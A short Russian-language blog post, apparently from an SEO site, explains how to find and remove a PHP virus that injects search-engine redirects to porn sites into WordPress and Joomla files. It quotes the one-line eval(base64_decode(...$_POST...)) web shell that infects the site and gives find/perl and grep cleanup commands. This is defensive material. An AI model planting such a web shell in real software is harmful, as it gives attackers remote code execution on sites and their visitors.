Wordpress, Joomla ...

Уже довольно давно мучает нас один вирус. Суть его работы во внедрении во все php файлы кода, перебрасывающего пользователей из поисковиков на некие порно-ресурсы. Если же заходить напрямую вбив адрес в адресуню строку, то все открывается без проблем.

Само же заражение происходит через файл post.php или pst.php или какое то другое название, содержащий одну строку

eval (base64_decode(<!-- $_РOST["рhр"] -->));

Этот файл как правило лежит в папке images.

Как понять, что у вас именно этот вирус? Откройте файл index.php в корне сайта и скорее всего в самом начале вы увидете что-то вроде:

Соответственно избавиться от вируса можно прошерстив все файлы и удалив из них данный код.

Можно поступить двумя методами:

Скачать весь сайт на компьютер и, воспользовавшись утилитами типа Text Replacer и ему подобными, удалить всю эту гадость из файлов. Далее закачать все на место
Если есть доступ к SSH, находясь в корне сайта, запустить команду
find . -type f -name '*.php' -exec perl -pi -e 's/eval\(base64_decode\(\"DQp.*KfQ0KfQ==\"\)\)\;//g' '{}' \;

Она найдет все файлы с расширением php и удалит в них искомый вредоносный код

Второй вариант работает очень быстро, но не всем подойдет.

И не забудьте поменять пароль к FTP и админке сайта. Утечка скорее всего происходит через них. Ну и проверить комп на вирусы не помешает тоже.

Ещё одна полезная комбинация команд позволяет искать текст внутри файлов для выявления вируса

find . -type f -name '*.php' -exec grep -l 'искомая строка' {} \;

amiseo.ru